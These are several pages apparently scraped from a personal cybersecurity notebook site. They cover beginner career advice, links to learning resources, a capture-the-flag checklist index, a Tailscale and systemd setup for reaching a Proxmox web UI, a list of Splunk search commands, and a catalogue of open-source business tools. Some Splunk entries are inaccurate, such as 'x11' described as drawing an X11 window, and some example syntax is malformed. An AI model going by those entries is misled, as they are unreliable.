------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ There has been an increase in those who are enthused about cybersecurity but instead of undergoing practical training to learn or ever holding a security role; they turn their cameras on and inform people an excessive amount of **useless junk content** with regard to cyber defense nor being in this field. Always be on the lookout for those who are out for clicks and clout versus actual security practitioners sharing their knowledge from experience. It has become very common where your favorite content creator is just out for money and they don't mind misinformation and disinformation along the way. They all appear to have a pattern of crashing publicly, having their toxicity exposed and/or asked to express their previous experience on their chosen subjects with no verifiable base for even discussing cybersecurity matters. Not all of them have bad intentions, but there is an infestation of more bad people than legitimate at the time of writing this. Now we have officially even made it to where if they are calling themselves a "hacker" frequently, it is probably smoke and mirrors for potential content payouts. [](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#gain-skills-not-just-knowledge) Gain skills, not just knowledge -------------------------------------------------------------------------------------------------------------------------------------------------------------- Some of these self-inflicted "skills gaps" for those starting out are due to role expectations after being certified. These are the same people failing tech interviews when it is time to perform. In the modern tech world it is no longer acceptable to just read a book, do a CompTIA exam and wing it until someone shows you mercy for employment. You must be more practical by not only learning theory of specialized security subjects, but you must actually PUT IT INTO PRACTICE! Being well-versed in theory will get you to a lot places but in the security space we do more than just discuss these matters, we must implement the solutions. **Reiteration:** Congrats on your recent certification, but this field can not truly solve issues with multiple choice tests. What can you do? [PreviousMartian Defense Notebook](https://martian1337.gitbook.io/notes) [NextCybersecurity Domains](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains) Last updated 1 year ago * [Stop Comparing](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#stop-comparing) * [Be consistent!](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#be-consistent) * [Just Ask!](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#just-ask) * [Beware of the modern-day "Enthusisast", "Influencer" and self-proclaimed "Hacker"](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#beware-of-the-modern-day-enthusisast-influencer-and-self-proclaimed-hacker) * [Gain skills, not just knowledge](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#gain-skills-not-just-knowledge) --- # Reading and Repos | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/reading-and-repos.md) . [Guide to learn hacking](https://www.youtube.com/watch?v=2TofunAI6fU) [Finding your first bug](https://portswigger.net/blog/finding-your-first-bug-bounty-hunting-tips-from-the-burp-suite-community) [Port Swigger Web Security Academy](https://portswigger.net/web-security/learning-path) [zonduu](https://medium.com/@zonduu/bug-bounty-beginners-guide-683e9d567b9f) [p4nda's Bug Bounty Blog](https://enfinlay.github.io/bugbounty/2020/08/15/so-you-wanna-hack.html) [A blog on subdomain takeovers](https://enfinlay.github.io/sto/ip/domain/bugbounty/2020/09/12/ip-server-domain.html) [clos2100 on getting started without a technical background](https://twitter.com/pirateducky/status/1300566000665014275) [al-madjus from 0 to bug hunter](https://klarsen.net/uncategorized/from-0-to-bug-hunter-my-journey/) [dee-see's resources for Android Hacking](https://blog.deesee.xyz/android/security/2020/01/13/android-application-hacking-resources.html) [Resources from @Nickyie](https://github.com/Nickyie/Cybersecurity-Resources) [Resources from @vlakhani28](https://github.com/vlakhani28/Cyber-Security-Resources) [Book of Secret Knowledge from @trimstray](https://github.com/trimstray/the-book-of-secret-knowledge) [Resources from @rmusser01](https://github.com/rmusser01/Infosec_Reference) [Cybersecurity Roadmap Repo](https://github.com/0xTRAW/Cybersecurity-Roadmap) [Hacksplaining](https://www.hacksplaining.com/) ! \--- [PreviousCybersecurity Domains](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains) [NextMedia](https://martian1337.gitbook.io/notes/training-and-career/media) Last updated 1 year ago --- # Capture-the-Flag Training | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training.md) . [Vulnerable Machine Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist) [Reverse Engineering Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist) [Mobile Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist) [Forensics Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist) [Binary Exploitation](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation) [Cryptography Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist) [PreviousAssembly Language](https://martian1337.gitbook.io/notes/notes/cheatsheets/assembly-language) [NextVulnerable Machine Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist) Last updated 1 year ago --- # Expose the Web UI over Tailnet | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet.md) . [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#running-tailscale-serve-persistently-on-proxmox) Running Tailscale Serve Persistently on Proxmox ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ To securely expose the Proxmox Web UI over your Tailnet, use the `tailscale serve` command with the `--bg` flag: Copy sudo tailscale serve --bg https+insecure://localhost:8006 Key Points: * The `--bg` flag runs Tailscale Serve in the background persistently until you explicitly stop it. * The Serve process automatically resumes after system shutdowns, reboots, or Tailscale daemon restarts- no manual restarts needed. * The `https+insecure://` prefix tells Tailscale Serve to connect to the local HTTPS backend (Proxmox Web UI) while ignoring its self-signed certificate. * You can check the currently running proxy with: Copy tailscale serve status * To stop the shared proxy at any time, run: Copy tailscale serve off * * * [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#ensuring-reliable-startup-after-reboot) (Optional) Ensuring Reliable Startup After Reboot ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- There is a known timing issue where the Tailscale daemon (`tailscaled`) may signal readiness before the Tailscale IP address is fully assigned, causing issues with dependent services starting too early. To fix this, create a systemd override to delay `tailscaled` readiness until the network is fully ready: Copy sudo systemctl edit tailscaled Add this to the override file: Save and exit the editor, then reload and restart the daemon: * * * [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#optional-systemd-service-for-tailscale-serve) (Optional) Systemd Service for Tailscale Serve -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- If you want to fully automate and guarantee the Tailscale Serve proxy starts after the daemon and network are ready, create a systemd service: 1. Create `/etc/systemd/system/tailscale-serve-proxmox.service` with: 1. Enable and start it: [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#summary) Summary ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * `tailscale serve --bg` runs persistently and automatically resumes after reboots or daemon restarts. * Using `https+insecure://` allows proxying to Proxmox’s self-signed HTTPS UI without certificate errors. * Systemd override on `tailscaled` ensures it signals readiness only when fully connected to the network. * Optionally, a systemd service can manage the Serve proxy for guaranteed correct startup order and restart on failure. [PreviousSecure Remote Access with TailScale + Hardened SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh) [NextRemote Unlock of LUKS-Encrypted Root Disk via SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh) Last updated 10 months ago * [Running Tailscale Serve Persistently on Proxmox](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#running-tailscale-serve-persistently-on-proxmox) * [(Optional) Ensuring Reliable Startup After Reboot](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#ensuring-reliable-startup-after-reboot) * [(Optional) Systemd Service for Tailscale Serve](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#optional-systemd-service-for-tailscale-serve) * [Summary](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet#summary) Copy [Service] ExecStartPost=timeout 60s bash -c 'until tailscale status --peers=false; do sleep 1; done' Copy sudo systemctl daemon-reload sudo systemctl restart tailscaled Copy [Unit] Description=Tailscale Serve Proxy for Proxmox Web UI After=network.target tailscaled.service Requires=tailscaled.service [Service] Type=simple ExecStart=/usr/bin/tailscale serve --bg https+insecure://localhost:8006 Restart=on-failure RestartSec=10 [Install] WantedBy=multi-user.target Copy sudo systemctl daemon-reload sudo systemctl enable tailscale-serve-proxmox.service sudo systemctl start tailscale-serve-proxmox.service --- # Splunk | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk.md) . 1. **index**: This is the index in which your data resides in Splunk. The specific indexes you have will depend on how you've set up your data inputs. 2. **sourcetype**: This specifies the data format for events from a data input, such as logs from a specific type of server or service (e.g., "access\_combined", "WinEventLog:Security", "cisco:asa", etc.). The sourcetypes available will depend on the types of data inputs you have. 3. **host**, **src\_ip**, **dest\_ip**: These fields typically represent the host, source IP, and destination IP associated with an event. The names of these fields may vary depending on your data. 4. **action**, **status**, **severity**: These fields often represent the action taken (e.g., success, failure, download, accessed), the status of a request or response, or the severity of an event or alert. These could also vary depending on your data. 5. **file\_path**, **process\_name**, **uri**, **query**, **user\_agent**, **service**, **port**: These fields represent various specifics of an event such as file paths accessed, process names, URLs or URIs accessed, DNS queries made, User-Agent strings in web requests, names of services, and port numbers. The names and availability of these fields will depend on your data sources. 6. **user**, **clientip**, **src\_user**, **session\_duration**, **process\_start**: These fields could represent the user or client IP associated with an event, the user on the source system, the duration of user sessions, or the start time of processes. These field names could vary based on your data. 7. **bytes\_out**, **bytes**, **amount**: These fields typically represent the volume of data associated with an event, such as bytes sent out or received, or amounts in transaction events. The exact field names may vary. 8. **EventCode**, **level**, **threat\_detected**, **device\_id**, **printer\_name**, **Country**, **description**: These are more specific fields that would be associated with certain types of logs, such as Windows event logs, system logs, threat detection logs, device logs, printer logs, location data, or threat descriptions. 9. `iplocation` * Determines the geographic location of IP addresses. * Example: `index=firewall | iplocation src_ip` 10. `cidrmatch` * Checks if an IP falls within a specified CIDR range. * Example: `index=firewall | where cidrmatch("10.0.0.0/8", src_ip)` 11. `localop` * Runs operation on the search head. * Example: `index=firewall | localop | stats count` 12. `metasearch` * Searches only the metadata. * Example: `index=firewall | metasearch | stats count` 13. `tstats` * Provides statistical information about indexed data. * Example: `| tstats count where index=firewall by sourcetype` 14. `datamodel` * Retrieves events from a data model. * Example: `| datamodel Network_Traffic All_Traffic search | stats count by All_Traffic.action` 15. `metadata` * Retrieves metadata about the hosts, sources, and source types in an index. * Example: `| metadata type=hosts index=firewall` 16. `predict` * Predicts future values based on historical data. * Example: `index=firewall | predict future_traffic as 'predicted_traffic'` 17. `x11` * Graphs the results in an X11 window for further examination. * Example: `index=firewall | x11` 18. `xmlkv` * Extracts field and value pairs from XML-formatted events. * Example: `index=firewall | xmlkv` 19. `map` * Runs a search for each result. * Example: `index=firewall | map search="search index=firewall src_ip=$src_ip$"` 20. `mcollect` * Collects metrics data points. * Example: `index=firewall | mcollect index=metrics` 21. `file` * Monitors the specified file until the command is interrupted. * Example: `| file /var/log/firewall.log` 22. `cluster` * Groups similar events together. * Example: `index=firewall | cluster showcount=true` 23. `anomalies` * Detects anomalous numerical values in data using machine learning. * Example: `index=firewall | anomalies p_value_field=bytes` 24. `findtypes` * Infers new event types from existing data. * Example: `index=firewall | findtypes` 25. `outlier` * Detects numerical outliers in your data. * Example: `index=firewall | outlier action_field=bytes` 26. `kvform` * Extracts field and value pairs from events. * Example: `index=firewall | kvform` 27. `tag` * Tags fields in events. * Example: `index=firewall | tag user` 28. `highlight` * Highlights specific terms in the search results. * Example: `index=firewall | highlight "denied"` 29. `typelearner` * Learns and suggests new event types. * Example: `index=firewall | typelearner` 30. `typer` * Infers and assigns event types. * Example: `index=firewall | typer` 31. `sendemail` * Sends search results via email. * Example: `index=firewall | sendemail to="admin@company.com"` 32. `strptime` * Converts a formatted time string into epoch time. * Example: `index=firewall | eval epoch_time=strptime(_time, "%Y-%m-%dT%H:%M:%S.%3N%:z")` 33. `strftime` * Converts epoch time to a formatted string. * Example: `index=firewall | eval date=strftime(_time, "%Y-%m-%d")` 34. `noop` * Does not change the events or results (often used with metadata). * Example: `index=firewall | noop | metadata type=hosts` 35. `makeresults` * Generates a result for testing purposes. * Example: `| makeresults | eval test="Test"` 36. `inputcsv` * Loads a CSV file for use in a subsearch. * Example: `index=firewall | inputcsv blocklist.csv` 37. `format` * Formats the results for use in a subsearch. * Example: `index=firewall | format` 38. `untable` * Converts table formatted data into separate events. * Example: `index=firewall | untable date user action` [PreviousIncident Response](https://martian1337.gitbook.io/notes/notes/defensive-security) [NextBasic Queries](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk/basic-queries) Last updated 1 year ago --- # Open Source Business & SaaS Tools | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools.md) . ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#cloud-infrastructure-and-virtualization-platforms) Cloud Infrastructure & Virtualization Platforms [Ubicloud](https://www.ubicloud.com/) – IaaS platform with compute, block storage, networking, and managed DB services. [Proxmox VE](https://proxmox.com/en/proxmox-ve) – Virtualization with KVM & LXC, clustering, backup. [OpenStack](https://www.openstack.org/) – Scalable IaaS for compute, network, storage. [XCP-ng](https://xcp-ng.org/) – Open source hypervisor, XenServer compatible. [oVirt](https://www.ovirt.org/) – KVM virtualization manager for data centers. [Virtuozzo Hybrid](https://www.virtuozzo.com/) – Container-based virtualization for density. [Nutanix Community Edition](https://www.nutanix.com/products/community-edition) – Hybrid cloud virtualization and hyperconverged storage. [KVM](https://www.linux-kvm.org/) – Linux-native virtualization technology. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#storage-solutions) Storage Solutions [Nextcloud](https://nextcloud.com/) – Encrypted file storage and collaboration platform. [GlusterFS](https://www.gluster.org/) – Distributed filesystem for scalable storage aggregation. [HekaFS](https://github.com/hekaheka/HekaFS) – Distributed filesystem with secure tenant isolation. [JuiceFS](https://juicefs.com/) – Cloud-native filesystem for big data, AI/ML applications. [LizardFS](https://lizardfs.com/) – Geo-redundant distributed file system for enterprise. [SeaweedFS](https://github.com/seaweedfs/seaweedfs) – Lightweight scalable distributed object/file storage. [Zenko](https://www.zenko.io/) – Multi-cloud data controller for unified storage management. [CubeFS](https://cubefs.io/) – Cloud-native storage with S3, HDFS, POSIX protocols. [MooseFS](https://moosefs.com/) – POSIX-compliant distributed file system at petabyte scale. [Swift (OpenStack)](https://docs.openstack.org/swift/) – Object storage for OpenStack clouds. [Garage](https://garagehq.deuxfleurs.fr/) – S3-compatible object storage for self-hosting/cloud. [lakeFS](https://lakefs.io/) – Git-like version control for object storage data lakes. [Hadoop](https://hadoop.apache.org/) – Distributed storage and processing for big data workloads. [Lustre](https://www.lustre.org/) – High-performance distributed file system for HPC. [OpenFiler](https://www.openfiler.com/) – SAN/NAS storage solution with web management. [OpenMediaVault](https://www.openmediavault.org/) – NAS for home/SMB, web-based management and plugins. [Kopia](https://kopia.io/) – Efficient backup tool for cloud/local storage. [BorgBackup](https://borgbackup.readthedocs.io/) – Secure deduplicating backup program. [Restic](https://restic.net/) – Fast, secure backup program for files and directories. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#infrastructure-as-code-iac) Infrastructure as Code (IaC) [Terraform](https://www.terraform.io/) & [OpenTofu](https://opentofu.org/) – Leading declarative IaC tools. [Pulumi](https://www.pulumi.com/) – Code-centric IaC with mainstream languages. [Ansible](https://www.ansible.com/) – Agentless automation and provisioning. [Crossplane](https://crossplane.io/) – Kubernetes-native cloud resource provisioning. [Terragrunt](https://terragrunt.gruntwork.io/) – Terraform wrapper for modular configs. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#remote-access) Remote Access [RustDesk](https://rustdesk.com/) - A fast, open-source remote desktop software that supports self-hosted servers for data sovereignty and enhanced security. It offers cross-platform support and is often recommended as a free alternative to TeamViewer with strong encryption and ease of use. [Remmina](https://remmina.org/) - A free and open-source remote desktop client primarily for Linux and Unix systems, supporting multiple protocols including RDP, VNC, NX, and SSH. [Apache Guacamole](https://guacamole.apache.org/) - A clientless remote desktop gateway that supports standard protocols like VNC, RDP, and SSH. It allows access via a web browser without needing client software installation, making it versatile for desktop management. [TigerVNC](https://tigervnc.org/) - An open-source VNC implementation providing high-performance remote desktop access. It supports most systems and is a strong choice for those preferring VNC protocol-based remote access. [DWService](https://www.dwservice.net/) - An open-source remote access service accessible from any browser. It requires software installation only on the host machine and supports unattended access. It also features a mobile app. Windows Only [mRemoteNG](https://mremoteng.org/) - An open-source, multi-protocol, tabbed remote connections manager for Windows ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#ci-cd-and-devops-automation) CI/CD & DevOps Automation [Jenkins](https://www.jenkins.io/) – Widely adopted automation server for CI/CD. [GitLab CI/CD](https://about.gitlab.com/stages-devops-lifecycle/) – Built-in pipelines inside GitLab. [Argo CD](https://argo-cd.readthedocs.io/) – Kubernetes GitOps continuous delivery. [Flux](https://fluxcd.io/) – GitOps toolkit for Kubernetes automation. [Tekton](https://tekton.dev/) – Cloud-native CI/CD pipelines built for Kubernetes. [Drone](https://drone.io/) – Container native CI/CD automation. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#devsecops-and-security) DevSecOps & Security [Checkov](https://www.checkov.io/) – Static analysis of IaC for security issues. [TFLint](https://github.com/terraform-linters/tflint) – Terraform configuration linter. [Open Policy Agent (OPA)](https://www.openpolicyagent.org/) – Policy enforcement engine for cloud-native apps. [Kubescape](https://www.kubescape.io/) – Kubernetes security and compliance scans. [Terrascan](https://github.com/accurics/terrascan) – Scans Infrastructure as Code (IaC) for security misconfigurations; supports multi-cloud environments and integrates into CI/CD pipelines. [ZAP (OWASP Zed Attack Proxy)](https://www.zaproxy.org/) – Popular web application security scanner detecting vulnerabilities like XSS and SQL injection with automated and manual testing modes. [Semgrep](https://semgrep.dev/) – Fast, customizable static analysis tool for scanning source code vulnerabilities across multiple languages in CI/CD workflows. [Trivy](https://aquasecurity.github.io/trivy/) – Comprehensive vulnerability scanner for container images, IaC files, and source code dependencies. [DefectDojo](https://defectdojo.github.io/) – Application security orchestration platform aggregating vulnerability findings and managing testing workflows. [Git-secrets](https://github.com/awslabs/git-secrets) – Prevents committing sensitive information (like passwords or AWS keys) into git repositories by scanning commits. [HashiCorp Vault](https://www.vaultproject.io/) – Secret management tool for secure storage, dynamic secrets, and identity-based access control. [Anchore Engine](https://anchore.com/opensource/) – Container scanning and policy evaluation platform for registry and CI/CD integration. [Prowler](https://github.com/prowler-cloud/prowler) – AWS security best practices assessment, auditing, and hardening tool. [KICS (Keeping Infrastructure as Code Secure)](https://kics.io/) – Open source IaC scanning tool detecting security issues and compliance violations. [Nancy](https://github.com/sonatype-nexus-community/nancy) – Dependency vulnerability scanner for Go projects. [Npm-audit](https://docs.npmjs.com/cli/v9/commands/npm-audit) – Vulnerability scanner for Node.js package dependencies integrated with npm. [Spectral](https://stoplight.io/open-source/spectral/) – Flexible JSON/YAML linter for API description and config files, aiding in security and best practices. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#monitoring-and-observability) Monitoring & Observability [Prometheus](https://prometheus.io/) – Monitoring and alerting toolkit for metrics. [Grafana](https://grafana.com/) – Data visualization and dashboard platform. [VictoriaMetrics](https://victoriametrics.com/) – Scalable time series database for monitoring. [Elasticsearch](https://www.elastic.co/elasticsearch/) / [OpenSearch](https://opensearch.org/) – Search engine and log analytics. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#networking-tools) Networking Tools [Nginx](https://nginx.org/) - High-performance web server and reverse proxy for load balancing and static content delivery. [HAProxy](http://www.haproxy.org/) - Robust load balancer and reverse proxy widely used for traffic distribution in critical environments. [Caddy](https://caddyserver.com/) - Simple web server with automatic HTTPS and easy configuration for quick, secure deployments. [Traefik](https://traefik.io/) - Dynamic reverse proxy with automatic service discovery for containerized and microservices environments. [OpenWISP](https://openwisp.org/) - Network management system automating configuration, monitoring, and VPN provisioning for Linux networks. [Ansible](https://www.ansible.com/) - Agentless automation tool for network and system configuration, orchestration, and deployment. [NetBox](https://netbox.dev/) - Network infrastructure management tool for modeling, documenting, and automating network operations. [Zabbix](https://www.zabbix.com/) - Enterprise-class monitoring solution for networks, servers, and applications with auto-discovery. [OpenNMS](https://www.opennms.com/) - Enterprise-grade open-source network monitoring platform with scalable and extensible architecture. [Nagios Core](https://www.nagios.org/) - Flexible monitoring system for networked devices with plugin architecture and alerting capabilities. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#erp-and-business-management) ERP & Business Management [Odoo](https://www.odoo.com/) – Modular business management suite with ERP, CRM, and more. [ERPNext](https://erpnext.com/) – All-in-one open source ERP for business processes. [Dolibarr](https://www.dolibarr.org/) – ERP/CRM for SMEs with invoicing and inventory. [Apache OFBiz](https://ofbiz.apache.org/) – Java-based enterprise ERP and automation. [ADempiere](https://www.adempiere.net/) – Community-driven ERP for finance, operations, and supply chain. [Tryton](https://www.tryton.org/) – Modular Python ERP system. [Corteza Low-Code](https://cortezaproject.org/) – Low-code business process automation and CRM. [Onfinity](https://onfinity.io/) – Cloud-native ERP solution for scalability. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#crm-and-sales) CRM & Sales [SuiteCRM](https://suitecrm.com/) – Feature-rich CRM fork of SugarCRM. [EspoCRM](https://www.espocrm.com/) – Lightweight CRM for automating sales and support. [OroCRM](https://oroinc.com/orocrm) – Multi-channel CRM for advanced reporting and e-commerce. [Vtiger CRM](https://www.vtiger.com/open-source-crm/) – All-in-one sales, marketing, and helpdesk CRM. [YetiForce](https://yetiforce.com/en) – Customizable CRM with project management and inventory. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#marketing-and-email-automation) Marketing & Email Automation [Mautic](https://www.mautic.org/) – Marketing automation for email campaigns and lead tracking. [Mailtrain](https://mailtrain.org/) – Node.js self-hosted newsletter app. [phpList](https://www.phplist.org/) – Bulk email manager for newsletters. [ListMonk](https://listmonk.app/) – High-performance newsletter manager in Go. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#e-commerce-and-pos) E-Commerce & POS [OpenCart](https://www.opencart.com/) – E-commerce platform with extensible modules. [PrestaShop](https://www.prestashop.com/) – E-commerce engine with rich module ecosystem. [Saleor](https://saleor.io/) – Headless commerce platform with Python/GraphQL. [Bagisto](https://bagisto.com/en/) – Laravel-based shopping cart and POS. [Magento Open Source](https://magento.com/products/magento-open-source) – Enterprise-grade e-commerce. [Zen Cart](https://www.zen-cart.com/) – PHP-based customizable storefront. [Odoo eCommerce](https://www.odoo.com/page/ecommerce) – Store builder inside Odoo ERP. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#accounting-and-finance) Accounting & Finance [GnuCash](https://www.gnucash.org/) – Accounting for small business and personal finance. [TurboCASH](https://turbocash.net/) – SME accounting with reporting and invoicing. [xTuple](https://xtuple.com/) – ERP including accounting, CRM, inventory. [Invoice Ninja](https://www.invoiceninja.com/) – Invoicing and billing for freelancers/SMBs. [Firefly III](https://www.firefly-iii.org/) – Personal finance and expense management. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#hr-and-payroll) HR & Payroll [Sentrifugo](https://www.sentrifugo.com/) – HRMS with employee, appraisal, and recruitment tools. [OrangeHRM](https://www.orangehrm.com/open-source/) – Recruitment, leave, and performance tracking platform. [Odoo HR](https://www.odoo.com/app/employees) – HR management in the Odoo suite. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#project-management-and-collaboration) Project Management & Collaboration [OpenProject](https://www.openproject.org/) – Agile and classic project management for teams. [Taiga](https://www.taiga.io/) – Scrum/Kanban project boards. [Focalboard](https://www.focalboard.com/) – Open source Trello alternative for task management. [WeKan](https://wekan.github.io/) – Collaborative Kanban boards. [Kanboard](https://kanboard.org/) – Minimal Kanban with automation. [AppFlowy](https://www.appflowy.io/) – Notion-style workspace for docs and tasks. [Penpot](https://penpot.app/) – Collaborative design and prototyping. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#helpdesk-and-support) Helpdesk & Support [Zammad](https://zammad.org/) – Modern helpdesk platform with ticket management. [Faveo Helpdesk](https://www.faveohelpdesk.com/open-source/) – Ticketing system for businesses. [FreeScout](https://freescout.helpdesk.io/) – Shared inbox and helpdesk management. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#knowledge-management-and-docs) Knowledge Management & Docs [Wiki.js](https://js.wiki/) – Modern Node.js wiki with various data sources. [BookStack](https://www.bookstackapp.com/) – Documentation and knowledge base platform. [XWiki](https://www.xwiki.org/) – Feature-rich enterprise wiki, Confluence alternative. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#team-communication) Team Communication [Mattermost](https://mattermost.com/) – Secure, self-hosted team chat. [Rocket.Chat](https://rocket.chat/) – Customizable chat with audio/video. [Zulip](https://zulip.com/) – Threaded team chat solution. [Jitsi](https://jitsi.org/) – Encrypted video calling and conferencing. [Element](https://element.io/) – Matrix-based secure messenger for teams. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#cms-and-website-builders) CMS & Website Builders [WordPress](https://wordpress.org/) – Leading CMS with plugin ecosystem. [Ghost](https://ghost.org/) – Publishing and newsletter platform. [Strapi](https://strapi.io/) – Headless CMS for API-driven content. [Webstudio](https://webstudio.so/) – No-code responsive website builder. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#automation-and-integration) Automation & Integration [n8n](https://n8n.io/) – Workflow automation for business data. [Appsmith](https://appsmith.com/) – Low-code builder for internal apps. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#security-and-password-management) Security & Password Management [Bitwarden](https://bitwarden.com/) – Encrypted password manager for individuals and teams. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#ai-low-code-and-emerging-tools) AI, Low-Code & Emerging Tools [Budibase](https://budibase.com/) – Low-code platform for building business web apps. [Activepieces](https://activepieces.com/) – Automation similar to Zapier, open source. [Eidolon AI](https://eidolon-ai.com/) – AI-powered software development automation. [MindsDB](https://mindsdb.com/) – Machine learning integration for applications and databases. [Mistral Devstral](https://mistral.ai/) – Open source LLM toolkit for developers. [Grist](https://www.getgrist.com/) – Spreadsheet-database hybrid for business data. [Plane](https://plane.dev/) – Project and issue tracking for teams. [Documenso](https://documenso.com/) – Document signing and management. [Dub.co](https://dub.co/) – URL management and shortening for marketing. [PreviousStarting a Business](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business) Last updated 8 months ago * [Cloud Infrastructure & Virtualization Platforms](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#cloud-infrastructure-and-virtualization-platforms) * [Storage Solutions](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#storage-solutions) * [Infrastructure as Code (IaC)](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#infrastructure-as-code-iac) * [Remote Access](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#remote-access) * [CI/CD & DevOps Automation](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#ci-cd-and-devops-automation) * [DevSecOps & Security](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#devsecops-and-security) * [Monitoring & Observability](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#monitoring-and-observability) * [Networking Tools](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#networking-tools) * [ERP & Business Management](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#erp-and-business-management) * [CRM & 